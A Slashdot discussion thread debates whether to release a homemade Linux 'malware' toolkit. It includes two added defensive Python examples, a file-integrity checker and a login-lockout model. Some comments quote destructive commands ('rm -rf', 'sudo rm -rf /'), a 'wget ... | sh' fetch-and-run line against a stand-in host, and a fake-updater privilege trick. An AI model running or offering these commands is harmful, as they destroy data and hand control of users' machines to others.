Ethics of Releasing Non-Malicious Linux Malware?
buchner.johannes writes "I was fed up with the general consensus that Linux is oh-so-secure and has no malware. After a week of work, I finished a package of malware for Unix/Linux. Its whole purpose is to help white-hat hackers point out that a Linux system can be turned into a botnet client by simply downloading BOINC and attaching it to a user account to help scientific projects. The malware does not exploit any security holes, only loose security configurations and mindless execution of unverified downloads. I tested it to be injected by a PHP script (even circumventing safe mode), so that the Web server runs it; I even got a proxy server that injects it into shell scripts and makefiles in tarballs on the fly, and adds onto Windows executables for execution in Wine. If executed by the user, the malware can persist itself in cron, bashrc and other files. The aim of the exercise was to provide a payload so security people can 'pwn' systems to show security holes, without doing harm (such as deleting files or disrupting normal operation). But now I am unsure of whether it is ethically OK to release this toolkit, which, by ripping out the BOINC payload and putting in something really evil, could be turned into proper Linux malware. On the one hand, the way it persists itself in autostart is really nasty, and that is not really a security hole that can be fixed. On the other hand, such a script can be written by anyone else too, and it would be useful to show people why you need SELinux on a server, and why verifying the source of downloads (checksums through trusted channels) is necessary. Technically, it is a nice piece, but should I release it? I don't want to turn the Linux desktop into Windows, hence I'm slightly leaning towards not releasing it. What does your ethics say about releasing such grayware?"
There were two options:
1. Release it anonymously and take no credit
2. Write about it and get some credit (but then you can't actually release it due to legal issues)
You can't (and won't) release it now. If somebody gets attacked with your code, guess who they're going to prosecute and/or sue.
How did you write this piece of unpossible software?! It's surely impossible to do this on Linux... You should leave now.
Just releasing Linux is an ethical problem. Hell, I can't even print anything since last Saturday.
Do it for the lulz...
You know you want to....
So you made a program that a user can run that will jack up their system and you consider this a security issue? I don't consider that inventive.
Here's something I wrote a long time ago but was slightly more destructive.. No one seems to care that if you run some code, it might actually run, damn fools.
#!/bin/sh
rm -rf
Contact someone at SANS, or Bruce Schneier, or some such. Maybe even someone on the SELinux project; if this non-malicious malware is indeed as capable without SELinux as you claim, and SELinux mitigates/eliminates the danger, this could be good PR for them.
.. but sounds like a lot of work to prove a relatively straightforward point.
It's actually been my opinion that Linux in the hands of someone who doesn't know how to use it can in some situations be less secure than Windows.
My reasoning for this is that:
1) Newbie Linux users who are having problems with their systems will pretty much run anything as any user you tell them to in a desperate hope to get Xorg working again
2) Linux commands on their own can look very cryptic to the uninitiated.. add into that the scripting abilities of most shells.. and a new Linux user won't be able to differentiate a malicious command from one that will get their nvidia driver working again
3) The out-of-box remote admin abilities of Linux are excellent.
4) Standard tools like nc can easily be used to establish out-connecting remote shell sessions
5) OR you can just get them to wget and execute your favourite piece of malware.
If you release it, will help anyone. Maybe you can share with security experts and try to find a solution, starting with you!!!!
Malware can exist for any platform.
However, real actual malware in the wild requires an eco-system to support it. Proving you can compromise a machine proves nothing. Proving that an ecosystem can actually exist on Linux machines would require completely releasing it into the wild, and subjecting innocent people to it.
I don't know about you, but I know where that falls when it comes to ethics and it ain't on the right side of it.
Wasn't SELinux implicated in part of making the mmap_min_addr root exploit even worse a few months ago? In fact, for one of them, I'm pretty sure that it was the cause of it. Just sayin'.
"My other computer is your Linux box"
Everyone who is paying attention knows there are plenty of hacking tools, bots, worms, and virus-like tools for Linux systems already. The only point to be made would be to the basement-dweller fanboys who are willfully ignorant anyway. So go ahead and release it, but don't expect anyone to applaud you for it.
put it on sourceforge. maybe let 4chan know. it's all good.
{fingers in ears} La la la la la la la la la la la la la.......
-- I have a private email server in my basement.
Why not treat this code like you would any other proof of concept of a security exploit? If the goal is to prove that security vulnerabilities exist and should be fixed, then show this code to whomever it will help actually fix those holes, but try not to release it to the public at large while it still represents a real threat. Show it to package and distribution maintainers and make recommendations on how they can improve their security configurations to prevent it from running, but don't release it as a build-your-own-rootkit tool if it has served its purpose and people are making a serious effort to address the issues it highlights.
It's not that "Linux is so secure" that makes it more secure to run.
It's that Linux hasn't become popular among the malware and virus writers, so we enjoy the benefit of less or no virus/malware.
So you want to make malware and virus writing popular in Linux too. Ugh...
I'm glad you're ethical. The millions of exploits for Windows prove that there are people ready to capitalize on any flaw. How long do you think it'll take them to make this malicious? How long do you think it'd take someone smart to engineer the same thing you did with just your explanation here?
This question is posed as if this is new ground. As if this hasn't been done before - without questions of morality and with distinctly less noble intent. All this worry about inserting a malicious payload is wasted. The script kiddies already have better options at their disposal.
Um, reading this, doesn't it require specific software to be installed to be effective? This does not appear, from what little info is presented, to be a general "hackin' tool" to "pwn newbs". Or maybe it is. Let me know when you can actually get into anything with this. As for releasing it: give it to the devs first. Let them patch things up. Then release it after patches are ubiquitous and discuss how clever you are. Anything else is just plain stupid.
Seriously, what is it with people not knowing right from wrong, or accepting responsibility for their own decisions? You're the one who has to sleep with whatever decision you make - why try to foist the blame on someone else if you decide wrong?
That's like one guy who said "My best friends' girlfriend wants to sleep with me - should I do it so I can show him what a sl*t she is?" If you're asking, it's because you want to do it and be able to say "don't blame me - everyone said it was okay !"
BTW - Good luck with whatever you decide, but a lot of us have been in the position of being able to do a lot worse, or been offered $$$ to do a lot worse, and you should be thankful we didn't have to get the group-think thing going before refusing.
Show it to distro developers and repository maintainers, people who do security work, etc. Let them look at it and see if they can defend against it. Don't release it on unsuspecting users, publish the directions to remove it, and defend against it so no one else can do it either. Putting malware in the wild is not the way to get white-hats attention, but it is the way to get black hat's attention. The white hats are usually well behind the black hats with malware that's been released in the wild. Give this to white hats and not black hats.
Post it as security bug against all the distros you've confirmed it works against. That'll attract the attention you want and not the attention you don't.
Perhaps the best action is to write and release these tools:
Tool A: It tells the user he has been compromised. It also saves copies of the files that may be altered.
Tool B: Copies all the old files and MD5s the raw files and the zipped files. (I think that it is hard to fake both MD5s.)
Tool C: Can replace the corrupted files with the saved copy. It may need a password: if the saved copy can be encrypted with some password, then it is not easily corruptible.
The real problem is not getting compromised - but not being able to verify that it has been compromised and being able to restore it.
Have I missed anything? - A careful user. ./ - read by millions, written by experts
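As an added example, not code from the thread or from its poster, here is a minimal version of "Tool B" and "Tool C" above: it baselines a set of files (hash plus a pristine copy), verifies them later, and restores a file that has changed. It also serves the persistence point made elsewhere in the thread (malware that writes itself into cron or .bashrc), since those are exactly the files one would baseline. Assumptions of mine: SHA-256 in place of the MD5 the post names, and a passphrase-keyed HMAC over the manifest standing in for the "password" the poster wants; the sample .bashrc and crontab contents in the demo are constructed.

```python
# Added example, not code from the thread: baseline / verify / restore in the spirit
# of "Tool B" and "Tool C" above. SHA-256 and the HMAC over the manifest are my choices.
import hashlib
import hmac
import json
import shutil
import tempfile
from pathlib import Path

MANIFEST = "manifest.json"
MAC_FILE = "manifest.mac"


def file_digest(path):
    # SHA-256 instead of the MD5 the post mentions (my choice; MD5 collisions are practical).
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def _mac(passphrase, data):
    # Passphrase-keyed HMAC over the manifest bytes: edits to the manifest are detectable.
    key = hashlib.sha256(passphrase.encode()).digest()
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def create_baseline(paths, store_dir, passphrase):
    """Hash each file, keep a pristine copy named by its digest, write a MACed manifest."""
    store = Path(store_dir)
    store.mkdir(parents=True, exist_ok=True)
    manifest = {}
    for p in map(Path, paths):
        digest = file_digest(p)
        shutil.copy2(p, store / digest)          # content-addressed pristine copy
        manifest[str(p.resolve())] = digest
    data = json.dumps(manifest, sort_keys=True).encode()
    (store / MANIFEST).write_bytes(data)
    (store / MAC_FILE).write_text(_mac(passphrase, data))
    return manifest


def load_manifest(store_dir, passphrase):
    """Refuse a manifest whose MAC does not match: it was edited or the passphrase is wrong."""
    store = Path(store_dir)
    data = (store / MANIFEST).read_bytes()
    if not hmac.compare_digest(_mac(passphrase, data), (store / MAC_FILE).read_text()):
        raise ValueError("manifest MAC mismatch: manifest tampered or wrong passphrase")
    return json.loads(data)


def verify(store_dir, passphrase):
    """Return {path: 'ok' | 'modified' | 'missing'} for every file in the baseline."""
    report = {}
    for path, expected in load_manifest(store_dir, passphrase).items():
        p = Path(path)
        if not p.exists():
            report[path] = "missing"
        elif file_digest(p) != expected:
            report[path] = "modified"
        else:
            report[path] = "ok"
    return report


def restore(store_dir, passphrase, path):
    """Overwrite a modified or missing file with its pristine copy from the store."""
    manifest = load_manifest(store_dir, passphrase)
    key = str(Path(path).resolve())
    shutil.copy2(Path(store_dir) / manifest[key], key)


def demo():
    """Constructed scenario: baseline a fake .bashrc and crontab, tamper, verify, restore."""
    with tempfile.TemporaryDirectory() as tmp:
        home = Path(tmp) / "home"
        home.mkdir()
        bashrc, crontab = home / ".bashrc", home / "crontab.txt"
        bashrc.write_text("export PATH=$HOME/bin:$PATH\n")          # constructed content
        crontab.write_text("0 3 * * * /usr/bin/updatedb\n")          # constructed content
        store = Path(tmp) / "store"   # in real use: somewhere the monitored account cannot write
        create_baseline([bashrc, crontab], store, "correct horse")
        clean = verify(store, "correct horse")
        with open(bashrc, "a") as f:                 # simulate an appended persistence line
            f.write("# constructed tamper line\n")
        tampered = verify(store, "correct horse")
        restore(store, "correct horse", bashrc)
        restored = verify(store, "correct horse")
        by_name = lambda rep: {Path(k).name: v for k, v in rep.items()}
        return by_name(clean), by_name(tampered), by_name(restored)


def demo_wrong_passphrase():
    """A wrong passphrase (or an edited manifest) must be rejected, not silently trusted."""
    with tempfile.TemporaryDirectory() as tmp:
        f = Path(tmp) / "f.txt"
        f.write_text("x\n")
        create_baseline([f], Path(tmp) / "store", "right")
        try:
            verify(Path(tmp) / "store", "wrong")
        except ValueError:
            return True
        return False


if __name__ == "__main__":
    print(demo(), demo_wrong_passphrase())
```

The caveat the thread's later comments hint at applies here: anything running as the monitored user can rewrite both the file and a baseline stored in that user's home, so the store and its passphrase have to live where that account cannot write (another account, read-only media, a remote host). Tools such as AIDE, Tripwire and the OSSEC mentioned further down do this at scale, with the same baseline-and-compare idea.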
I love
I'm fed up with the general consensus that people are able to walk around outside without being punched in the face. After all, anyone can be punched in the face at any time, so I've been thinking about going up to random people on the street and punching them in the face. People need to learn to take reasonable steps to protect themselves from being punched in the face, such as wearing full-face motorcycle helmets at all times, and how are they going to learn that if I don't show them? But now I'm having second thoughts about whether or not it would be ethical to go around randomly punching people in the face. Does anyone have any advice?
The correlation between ignorance of statistics and using "correlation is not causation" as an argument is close to 1.
Release it and do the same with OS X shortly thereafter.
Any programmer worth a grain of salt could write the same thing at the drop of a hat. I don't understand where it would be all that interesting.
Got Code?
Which simply shows that the lack of Linux malware isn't because Linux is somehow magically superior, but simply because nobody has taken the time to write any.
Even better, pretty soon we'll have clueless noobs with their new netbooks running Google's ChromeOS (which they don't know is really Linux because Google is doing everything they can to avoid the "L" word). Now they can get pwned too!!
I was fed up with the general consensus that Linux is oh-so-secure and has no malware.
Just because it's a consensus doesn't mean it's correct. As you have demonstrated, it's very much possible to write malware targeted at Linux.
In fact, there are plenty of viruses and malwares specifically targeted at Linux, and their numbers are rising: http://www.internetnews.com/dev-news/article.php/3601946
However, because desktop Linux has an extremely small market share, malware for Linux has a correspondingly tiny market share.
Think of it this way, a few weeks ago you woke up and came up with the idea of writing a piece of potential malware directed at Linux. But there are a hundred who woke up with the same idea, except they wanted to target Windows. In the end, 101 new malwares are born, with only one of them intended to harm Linux systems.
As you said in your own post, compromising a Linux box isn't impossible. The code you have isn't all that revolutionary, it's just a demo. Anybody with actual malicious intent would likely know how to make a program like this themselves. Another option would be to set up the system on your server but not release the source; you could demonstrate the weaknesses of *nix without putting anybody in any real danger.
no
Get in touch with the security community as some other poster said.
Then concentrate on releasing a paper about your software. If your techniques are good, they might be an interesting read. Even more important is that if your software does not escalate privileges (as I understand), cleaning your software should be a straightforward job from the superuser account. Those cleaning techniques will probably be even more interesting.
I'd use a rather obvious payload that reveals itself when interrogated (instead of BOINC) in order to be useful for evaluating system security.
I don't think your malware is as nasty as you think, as you said you relied on executing downloaded software in a world with signed repositories and with MD5 hashes/PGP signatures as a normal custom. I also think you're underestimating the difference between the administrator-all-the-time Windows way and the only-escalate-when-needed model of the Unix world. It would be interesting to see what happens, though.
GPG 0x1B479C78
That's like one guy who said "My best friends' girlfriend wants to sleep with me - should I do it so I can show him what a sl*t she is?"
Of course, why actually sleep with her when you can just brag about her offer on slashdot!
ME !! I will do what's right. Muhahahahahhahahah !!
"mindless execution of unverified downloads"
Thanks Captain Obvious, show me a system that would stand up to an attack in that instance. Any user-privilege activity (cron, editing .bashrc, etc...) is vulnerable if you throw that in the mix.
Look at it this way, if you log into your computer only to find that the computer has mysteriously joined Boinc what would you do? You would try to find the source, but when in doubt, probably wipe the partition and re-install. If you worked for a large corporation you might have to file all kinds of reports, alert all kinds of security personnel etc. That 'harmless' prank could cost thousands of dollars.
Let's put it another way. Even if I left my house door wide open, opened all the windows, etc., it still does not give you the right to come in and f*ck with my house.
I reserve the right to track down anyone that even attempts to break into my house or my computer and kick their ass. I don't give a rat's @$$ that you don't like Linux fan boys or whatever the reason for 'why' you did it.
kdawson - you need to get punched a few times for even rationalizing that it just might be O.K.
I don't see how social engineering is proof of concept on this one. Mindless execution relies on social engineering, which is how most malware spreads. Put malicious code in a PPS or something like that isn't going to prove the lack of security, unless you cross into the superuser account. By then, it doesn't matter. Mac can be compromised this way. Microsoft has hundreds of thousands of ways this can happen. Linux is just software. This means it is vulnerable. But compare software strength to person strength, that's where you can prove something. Linux has its flaws just like anything else. But if it relies on someone physically executing the code, you can't prove system weakness. Idiot weakness doesn't count.
The claim is that a PHP injection on a web server is going to also infect user-owned tarballs and wine executables and root-owned shell scripts without exploiting a privilege escalation hole? Either his webserver is configured to run as root, or this claim doesn't pass the smell test.
http://www.mhall119.com
I'm sure there are some people in the computer security world who you admire. So ask yourself, what would these people do if they had discovered the exploits? What would Phil Zimmermann, or DJB do? Some of these people were unhappy with the current situation, and took their own road and created some good, secure software.
Also, maybe your code isn't as good as you claim. Or maybe it mostly uses known exploits. It's time for a reality check. You should try to find some peers, and discuss it with them to determine how dangerous your product really is.
"Can of worms? The can is open... the worms are everywhere."
Kind of like blaming the digital camera for sexting. Technology is neutral; it's people that are evil.
We already know how to break into systems with buffer and heap overflows. We know how to do SQL injection into not-so-smart applications. If you work at it you can break into almost anything.
Absolutely no good purpose is served providing a toolkit that allows people to break into naively configured systems. Much of what you describe is akin to leaving the keys in your Maserati with the doors unlocked and the engine running. Please don't make things easier for joyriding teenagers.
If a site wants to know if they're secure, within the current limits of our knowledge, they can perform their own audits, and hire their own advisers to test their systems in a controlled fashion.
Applications, such as BOINC, have an unknown state of security review or audit. I doubt they applied the coding guidelines of CERT, or any of the Common Criteria levels. An administrator would only deploy such applications in the DMZ of their network. To call a Linux system, or Windoze system, secure means you've evaluated the risk of both the operating system and the applications on that system and decided it is good enough for you.
to CERN or some other security group, or to White Hat Hackers who won't release it or use it, but study it and find a way around it.
I would pass it on to some Linux kernel and Linux OS developers, and see if they can fix the security holes you found that allow the hacking of Linux.
If you release it into the public for anyone to download, dollars to doughnuts some idiot is going to replace the BOINC client with a packet sniffer or key logger or something else. It is like inventing a rocket or missile and then someone takes it, steals your design, and then places a WMD in the warhead and launches them at public areas. Just like we wouldn't want technology leaked to Iran, Cuba, Syria, Sudan, North Korea, and other places that could use it for better missiles, guidance systems, encryption, etc., some cyber terrorists would use your code for espionage on some Linux web servers run by governments and the military because they thought Linux would be more secure than Windows.
Remember, Slashdot does not have a -1 disagree moderation, and no, troll, flamebait, and overrated are not substitutes.
It's not real if there is no link.
I'll help you out, just send it in a tarball to me, and I'll verify if it works or not. Oh, I'm sure you want to keep it opensource and all, so just put the source in there too... I'll make sure your given proper credit. Thanks. :)
--- Relax, that mass murderer is just trying to reduce our carbon footprint, one fetus at a time...
yeah, in all it's capitalized glory, that was my opinion right on the title. why so? because there will be time for that, there is enough crappy stuff floating on the intertubes as to release a 'toolkit' that allows to add the whole world of linux servers to the fotm botnet
FTFS: "The malware does not exploit any security holes, only loose security configurations and mindless execution of unverified downloads"
how is that different than posting a script with "sudo rm -rf /" and asking people to download and execute it?
I was a Windows user for almost ten years. I never used an antivirus or antimalware program, and I never had any security problems. 99.9% of security issues are problems between keyboard and chair.
Well, in general, if you petition a large number of others for advice on a decision you're not sure of, you'll probably be less likely to do something stupid. After all, the general public has a low but well-known level of intelligence, and as an individual you may be stupider than that yourself.
Yeah, really! Ethics is easy!
Will releasing it make you money? No? Then don't do it.
See how easy that was?
Intellectual Property is a monopolistic, selfish, and defective concept. It is "tyranny over the mind of man"
Security through obscurity isn't. Publish.
Since, despite the popular belief, the idea of a grey/black/white hacker being distinct solely because of intent is, at best, a falsity, the idea that one could release something with the potential of being as destructive as TFS claims is a no-brainer.
The answer is no. Under no circumstances should the package be released.
Because, to release the code is no different than saying "I only illegally accessed your systems, Mr. FBI, to show you how it could be done. I am an honest little boy/girl".
0100010001101001011001 0100100000011010010110 1110001000000110000100 1000000110011001101001 0111001001100101
Its whole purpose is to help white-hat hackers point out that a Linux system can be turned into a botnet client
It would be nice to see the code. As it stands, I am surprised that this "news" made it this far, with no links of any kind.
No one credible claims that malware is impossible in GNU/Linux or *BSD. In fact, since UNIX is a much more robust networking OS, maintaining a botnet should be helluva lot easier than on Windows. What we have with a free OS, though, is something that proprietary OS users will never have: a complete and total control over our security policy and every other aspect of our software environment. When and if a vector is identified, our security policy will promptly change to nip it in the bud.
A Speculative Example
Lately I've been thinking about one major vector: the human-assisted privilege escalation. Take the latest Ubuntu and imagine a piece of software which runs with user privileges and does the following: it tricks the user into thinking that it is the automatic updater. Lacking in both expertise and time, I am not going to do a proof of concept, but how hard can it be? You just need to draw a window named "Update Manager" using the standard Gnome API, list a few bogus updates anyone would find legit, with version number irrelevant to their day-to-day life (e.g. binutils), wait for the user to click [Install Updates], and then "gksu pwn_you.sh". The user will enter the password, and your work is done. Then, of course, you still need to draw some progress bars to lull the user into believing that an update is going on, but that's all just an icing on the cake.
If anyone can see why this won't work, I would like to hear it.
Looks scary, right? Wrong. Because the solution is as simple as changing the default policy. Make it so that the default behavior is to notify only. On every system update the user should be told: "Go start the updater via the system menu. By the way, if you EVER see an "updater" you didn't start yourself, you are being pwned." Make sure that the system menu is strictly read-only, and even the dimmest user will be safe.
This won't be implemented in Windows. Why? I really cannot guess why Microsoft's security policy seems to be designed from ground up to fuck the user, but it is. The usual excuse seems to be: "it's easy to use". But whatever is the reason, you just cannot make a proprietary platform secure because you cannot pop the hood open. With a free OS, you can.
Post it to the internet with a headline of "Nude Pictures of Brittany Spears!! (Linux only)." Oh, and give it a payload that allows you to pwn the computers it gets downloaded. And then you'll have a Linux botnet!! How cool is that!!
And, next time somebody posts on /. "imagine a beowulf cluster of those" -- well, you'll actually have a beowulf cluster of those.
Oh, and I almost forgot:
3. ???
4. profit!!
Too bad I've already commented on this thread, or I'd mod that up.
But I'll also say that my mother runs Fedora 11, and the SELinux configuration is a lot better than in previous Fedora releases. The SELinux reports are all related to config files in her home directory, and those are carried over from previous Fedora installs. From what I can see, someone got a clue and cleaned up the general Fedora SELinux configuration in a big way.
Who modded this funny? It's insightful, if anything.
What you are contemplating doing is roughly, the digital-electronic equivalent of supplying criminals with maps of wealthy communities, marked with what areas are and are not guarded, where valuables are kept, etc. Don't think that simply because you didn't write a truly malicious payload, that by letting others use a tool you can and should reasonably know will be used for evil purposes you don't share in the culpability, ethically if not legally, even if you don't pull the trigger yourself. ~Hal
Insecurity through stupidity is a common problem on Linux. The Ubuntu forums are full of users wailing that their machines got hacked after they installed FTP, SSH or VNC with a kewl four letter password. One could argue that it is not the users, but rather the Ubuntu developers that are stupid by not configuring PAM to enforce password complexity by default, since it is not really a flaw in 'Linux' per se, but it could certainly be considered to be a dumb-ass flaw in the Ubuntu distribution.
Excuse me, but please get off my Pennisetum Clandestinum, eh!
Who modded this funny?
I did. Yes sir, it was me, I'm guilty.
"After a week of work, I finished a package of malware for Unix/Linux."
Really, this might be a fun thread. Just out of curiosity, did you use vi or emacs to code it? And if you actually plan to release the code, there is also the question of the license.
as long as it's licensed under a proper Free Software license. Who gives a fuck.
With so many new Ubuntu users, Linux is already windoze in the security sense.
How else are we going to accept that which we obstinately refuse to see?
-- newall
The exploit relies on "loose execution of unverified downloads"...
Is this the joke about the virus that spreads itself by telling the user "send this email to all your friends then format your hard drive" ?
Once you have code executed on a machine that doesn't have good security, you manage to get a local root exploit and then do some "really nasty thing" to persist across a reboot?
Please?
Really nasty as in escaping offline IDS?
Publish your kiddie exploit, I'm laughing out loud...
: )
We Linux geeks won't censor you or sue you or something. We're not MS.
It's not a hazard. It's a benefit. We understand.
Colorless green Cthulhu waits dreaming furiously.
Sounds like you have too much time on your hands. Linux and Unix boxes get rooted and kitted all the time, from various security holes in PHP, SQLi, etc. Writing some "greyhat malware" package doesn't really demonstrate anything. It's a well known fact that *nix is still vulnerable to attack, and I really see no relevance to what you're doing. Besides, anyone who runs a locked down system and has any degree of paranoia wouldn't run SETI@Home, Distributed.net or any other similar distributed client software. OSSEC would pick this jazz up in half a second. Congratulations on some questionable bash scripting.
Security through obscurity does not work. If you can write a program there is at least one much less ethical person out there willing to do it as well. The fact we don't see it suggests that people are not motivated or see a benefit in doing it. I suspect much won't happen if you release it. I realize it might also be the case that it is going unreported. Either way it will get developers motivated to fix the issues. See Microsoft for example. So that when Linux becomes a major OS and people will want to freak the systems they will have a much harder time.
>mindless execution of unverified downloads
There is no cure for stupid on any platform.
People will install purple gorillas and cd-drive-cupholders. This is not new.
But beyond user stupidity, there are reasons why propagation of badware on Linux and Unix sucks, and I suggest that people read Tom's excellent rant here: http://slashdot.org/comments.pl?sid=3291&cid=1395315
This situation may not last (c.f., sudo silliness on fedora), but unless you can do a miracle of social engineering, treachery, and underhandedness and get your badware included in the main repositories as source (which repo maintainers and end users use to build packages), you're not going to get very far in the *nix world.
--
BMO
I don't know...we do a lot of stuff as a collective already, more of it the more "advanced" we are.
One that hath name thou can not otter
If you can truly spread this as easy as possible, then do so. But put a payload into it that closes all the holes it slips through. Proof of concept achieved, morals remain intact.
UTF-8: There and Back Again
I have a strong suspicion that this whole "question" is merely an attempt by Windows marketdroids to spread one of their favorite FUD formulas: "Linux is not really secure, it's just too unpopular to be targeted by malware writers". Please note how often it is mentioned in otherwise content-free comments.
There is no actual "malware". All author claims is that he wrote something that demonstrates the fact that a program executed on a Linux box by a user has that user's access privileges and can do stuff that the user does not expect or like. That's at best a trojan horse -- without capability to gain superuser privileges or compromise other users or hosts, such "malware" is firmly in the range of stupid pranks -- slightly below changing someone's wallpaper to goatse and slightly above asking someone to check out the Last Measure web site. It has nothing to do with millions-strong botnets and hours-to-worldwide-pandemic worms that make Windows such a great platform for crooks and vandals.
Contrary to the popular belief, there indeed is no God.
What it all boils down to is marketshare. I deal with malware from all ends of the spectrum, and the entire purpose of modern malware is usually one thing: to make money. Whether that be by using that machine in a botnet, stealing banking or other logon info, or by trying to get someone to pay for fake security software, malware has turned into (within the last decade) a major business. Due to lack of enforcement, these things mainly stem from countries with little oversight (African countries, Russia, tiny islands, etc.) and are hard to take down. The reason Linux has not been mass targeted is that it normally represents the higher end of the user spectrum, whereas Windows is the low hanging fruit. Take international pickpockets or muggers. The offenders will find the most vulnerable target who is unaware of their surroundings and unable to defend themselves. Windows is a 60 year old lady in a foreign market with her passport and wallet around her neck wearing bright pink, taking pictures and not paying attention. Linux is more like an aware person who has made themselves a hard target just by knowing what not to do. Macs seem to be the exception for the moment, and this is where I actually happen to see a huge potential for this to change though. More and more, instead of the family tech having to support a family Windows box, it is simply easier to just tell a novice to get a Mac. Once this reaches a certain apex, that is when malware will target it. Just about any system can be compromised, but back to my original point: is it worth it (money?)
"It's ok, I'm completely secure as long as my iron is off"
I work with AS400 and iSeries machines (and I accept your collective condolences). When I first got trained on them, the teachers told us that OS400 has never been hacked. Not having any real data to confront them, I just let it pass. When we covered the section about user ids and passwords, I found out that 400's force you to disable a user id and password after a certain, finite number of logon attempts. This was by design. All user ids, including system administrator ids had to have some number (I forget how high you can set it) of illegal attempts before the id is locked out. (Usually this is set to 3) They explained, smugly, that this was to keep out intruders.
We further learned that user id's could not be set to more than 10 characters. So I raised my hand and asked what happened if all the user accounts got disabled. They said that IBM would have to back door their way in to unlock a system administrator account, and from that account, others could be reset. (This would be BAD and time consuming, so it was good practice to keep a few SYSADMIN accounts around just in case) I asked if they had ever heard of a denial of service attack. Of course they said. So I asked the obvious question, "What if someone wrote a script to log on to every 10 digit user account 3 times with a blank password?" The reply was "Why would anyone do THAT?"
I pointed out that while I couldn't "hack" their system by their definitions, I could sure as heck turn it into a boat anchor, and do it remotely if it was hooked to the Internet... "Yes, but you can't HACK it was the reply..."
Brawndo: It's what plants crave!
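The lockout-as-DoS problem described in the AS400 anecdote above is easy to model. The following is an added example, not code from the poster or from any IBM product: it compares a permanent per-account lockout with a per-source throttle on a constructed blank-password sweep (the user names, passwords and addresses are made up). The point it shows is that an account-lockout policy lets a remote party disable accounts it never authenticated to, while slowing down the failing source leaves legitimate logins from elsewhere working.

```python
"""Two responses to repeated failed logins, compared on a constructed
username sweep. Illustrative model, not any real system's code."""
from collections import defaultdict

# Constructed credential store (plaintext only because this is a toy model).
USERS = {"QSECOFR": "correct-horse", "ALICE": "battery-staple"}


class AccountLockout:
    """Disable an account after max_failures bad attempts, whoever made them."""

    def __init__(self, max_failures=3):
        self.max_failures = max_failures
        self.failures = defaultdict(int)
        self.locked = set()

    def attempt(self, user, password, source, now):
        if user in self.locked:
            return "locked"
        if USERS.get(user) == password:
            self.failures[user] = 0
            return "ok"
        self.failures[user] += 1
        if self.failures[user] >= self.max_failures:
            self.locked.add(user)
        return "denied"


class SourceThrottle:
    """Delay the source that keeps failing; accounts themselves stay enabled.
    Each consecutive failure from a source doubles its wait, up to max_delay."""

    def __init__(self, base_delay=1.0, max_delay=3600.0):
        self.base_delay = base_delay
        self.max_delay = max_delay
        self.strikes = defaultdict(int)
        self.next_allowed = defaultdict(float)

    def attempt(self, user, password, source, now):
        if now < self.next_allowed[source]:
            return "throttled"
        if USERS.get(user) == password:
            self.strikes[source] = 0
            return "ok"
        self.strikes[source] += 1
        delay = min(self.base_delay * 2 ** (self.strikes[source] - 1), self.max_delay)
        self.next_allowed[source] = now + delay
        return "denied"


def sweep_then_login(policy):
    """Replay a constructed blank-password sweep over every account from one
    address, then a real login from another address; return both outcomes."""
    t = 0.0
    for user in USERS:
        for _ in range(3):
            policy.attempt(user, "", "203.0.113.7", t)
            t += 0.01
    attacker = policy.attempt("QSECOFR", "", "203.0.113.7", t)
    legitimate = policy.attempt("QSECOFR", "correct-horse", "198.51.100.2", t + 60)
    return {"attacker": attacker, "legitimate": legitimate}


if __name__ == "__main__":
    print("lockout :", sweep_then_login(AccountLockout()))
    print("throttle:", sweep_then_login(SourceThrottle()))
```

The throttle is not a complete answer either: a sweep spread across many source addresses gets around a per-source delay, which is why real systems usually combine a short, expiring lockout with source-based rate limiting and alerting rather than a permanent disable.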
If you are worried about the legal implications, why don't you just present and release it as something like 'automated remote boinc installer'. At that point, it is the decision of the end user whether to use it for its original purpose, or change it for their own purpose (be it legal or illegal). Make sure to release it under a good license that releases you of liability. Do not release it as 'Linux malware', or you probably will get pinned for it.
End users should only run stuff they get through the Ubuntu Software Center. Never download binaries. Never download source. If it's not in the app store, screw it.
Yeah, really! Ethics is easy!
Will releasing it make you money? No? Then don't do it.
See how easy that was?
No, no, no. Ethics cannot be based on money because money is only a means to an end not an end in itself. We must fall back on the ethical basis nature gives us as anything else is artificial.
Will it get you laid?
Will it enhance the ability of your children to get laid?
If yes, then you are morally obligated to do it.
You're thinking small. Why miniaturize the laser, when we could instead enlarge the sharks? -John Searle
... is that after a Linux developer writes malware, he/she contributes it to the community. When a Windows developer creates malware, he/she uses it immediately for fun or profit.
Well, in general, if you petition a large number of others for advice on a decision you're not sure of, you'll probably be less likely to do something stupid.
After all, the general public has a low but well-known level of intelligence, and as an individual you may be stupider than that yourself.
Average IQ is 100
Hopefully, IQ is higher on /.
$ make available
Would you be so kind as to open a terminal window, Mr. User, and run this for me so that you can join my cool bot net.
wget www.somewhere.com/somefile.sh -O - | sh
Oh no what will the community do, I may have just released a very serious malware exploit vector.
Got Code?
If Linux malware is unheard of, why does McAfee sell LinuxShield?
Anyway, people have been releasing internet-wide UNIX malware for at least 21 years.
http://ask.slashdot.org/comments.pl?sid=1461872&cid=30278928
If you release it, you had better release it under the GPL, or it really will be an unethical release...
I don't like Linux. This doesn't make me a troll.
Malicious ware? How can something be non-malicious malicious ware? Doesn't that contradict itself? And how is releasing something that does something to someone's computer without their computer considered a good thing?
That's right- I feel smarter just being here.
http://en.wikipedia.org/wiki/Morris_worm
Non-malicious malware.... Dudware?
Political correctness is really just herd psychology pushed by insecure people who desperately seek social conformity.
Unless you are saying we are all born with an innate ability to determine if all possible actions are right and wrong, and thus also say that all possible actions do in fact have a single, unequivocal answer to the question "Is this right?". If you are saying all of that, sure, you are right.
However, if you aren't, then there is good use in discussing ethical issues. If we are finite beings incapable of omnipotence, then admitting that we don't know the answer ourselves is a fairly intelligent act compared to flipping a coin. There may be options that one doesn't see on their own, that are far better and will be thought up through intelligent discussion.
You might also really want to talk to a lawyer who knows the Computer Fraud and Abuse Act. At a minimum, you may need to worry about 18 USC 1030(a)(5). Pay attention to the definition of "damage" and "loss" in 18 USC 1030(e)(8),(11).
If it's for-profit but free, you're not the customer -- you're the product (e.g., the Slashdot Beta's "audience").
Malware == malicious. Doofus.
Do not release it. Make people do their own damn work.
Linux malware that requires manual running is trivially easy to do.
Copy and paste: sudo rm -rf
Enter your password
Come back when you have malware that can remotely infect a target machine without user interaction.
Why does my process list show BOINC?
I say release the ideas, or at least document the concepts with pseudocode so that the average skript kiddie can't just download and modify - they'd at least need to spend the time implementing it in some language.
